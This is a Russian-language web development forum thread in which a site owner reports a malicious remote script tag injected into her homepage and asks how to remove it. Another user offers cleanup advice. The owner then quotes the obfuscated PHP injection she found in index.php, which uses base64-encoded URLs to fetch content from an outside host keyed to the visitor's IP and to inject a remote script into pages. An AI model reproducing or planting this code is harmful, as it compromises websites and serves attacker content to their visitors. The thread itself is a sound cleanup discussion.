Профиль и настройки
Заказы Лицензии Техническая поддержка Выйти
Регистрация
Регистрируясь, вы подтверждаете свое согласие с соглашением об использовании персональных данных.
Восстановление пароля
Вход
на Главную /  Разработчикам /  Форум /  Разработка сайта

Снова о вирусах

11.02.2013, 13:21
Gvenv_nk

Зарегистрирован:
2008-03-26
Сообщений: 8

 		Здравствуйте! Просматривая исходный код главной страницы в браузерах, в самом низу (после </html>) обнаружила следующий код:
Код:
<script src="http://gkvaxwl.freewww.info/rsize.js"></script>

В макетах дизайна его не вижу. Перечитала на форуме переписку о вирусных атаках на сайты, но ответа конкретно на свой вопрос не нашла. Подскажите, где искать концы и как лечить?
11.02.2013, 14:26
Asiat
Аниматика
Asiat

Зарегистрирован:
2005-12-12
Сообщений: 576

 		Симптомы лечить простым текстовым поиском по файлам (скорее всего) и/или поиском по базе данных.
Причину болезни искать сложнее, но для начала просто смените все пароли на хостинге.
Коли будет не лень, проверьте лог-файлы сервера, к которым есть доступ. Лог авторизации, например, лог изменения файлов по FTP... Если определите конкретную дату заражения (часто она же дата модификации файлов), то будет попроще.

Разработка сайтов на Netcat с 2006... хм-м ... или 2005 хммм года. В общем, обращайтесь.
11.02.2013, 14:36
Гость
Гость

 		Туда они его и прописали:
Код:
function sql2_safe($in) {

        $rtn = base64_decode($in);

        return $rtn;

}

function collectnewss() {



		if (!isset($_COOKIE["iJijkdaMnerys"])) {

        $value = 'yadeor';

		$ip = $_SERVER['REMOTE_ADDR'];

        $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;

		$content = @file_get_contents($get);

		@setcookie("iJijkdaMnerys", $value, time()+3600*24);

		if (!$content)

			echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9mZWVsdGhlc2FtZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=");

		else 

			echo $content;



		}

}

Исправила файл на хосте, и срипт пока исчез. Перепроверила .htaccess, vars.inc, в них ничего подозрительного не обнаружила. Данные для входа по фтп и на панель хостинга, естественно, поменяла. Далее воспользуюсь Вашими советами - наверняка же враги так просто не сдадутся.
Спасибо за помощь!
11.02.2013, 14:39
Гость
Гость

 		Имелся в виду файл index.php (это снова я, автор топика).
198 196 2013-02-11 14:39:48 12905
Описание проекта
Сохранить и свернуть